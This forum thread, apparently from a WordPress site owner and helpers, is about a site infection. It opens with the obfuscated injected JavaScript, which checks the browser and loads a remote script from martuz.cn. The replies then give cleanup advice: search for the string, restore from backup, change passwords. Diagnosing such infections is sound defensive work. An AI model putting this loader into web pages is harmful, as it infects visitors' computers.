var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//mart"+"uz.cn/vid/?id="+j+"><\/script>");}You're rather lucky here, aslong as the script is the same in all files, as all you need to do is search for the string "mart", as the obfuscation is extremely basic.

On your homepage, this script appears just next to the "HEAD" HTML tag;

The one that really puzzles me. I have tried accessing my website from a few computers and it is only my computer which heads to "martuz.cn" is that normal?!!!

It depends entirely on the settings of the browser and the firewall (i.e. if the browser is set to block Javascript it won't load, and if the firewall is corporately owned, it's likely already set to block this domain)

Since you're using WordPress by the way, the main files you need to reinstall and/or clean, are your themes (located in /wp-content/themes), though I'd recommend checking ALL of the files just to be on the safe side, as chances are, they'll have also uploaded a shell to enable them to re-access your site, should the FTP credentials be changed. If you're comfortable doing so, it will be much quicker and much easier, to delete the WordPress files, and re-upload a clean copy of them (you can obtain the WordPress files from wordpress.org)

I recommend to delete all files at your site and to restore everythingfrom a clean backup. Some php files have been added by this malware, forexample /images/gifimg.php. I don't recommend to sort out the files manually.

Please change the password of your site and restore your site completely from a backup.Don't try to fix individual files if you don't know exactly why you are doing.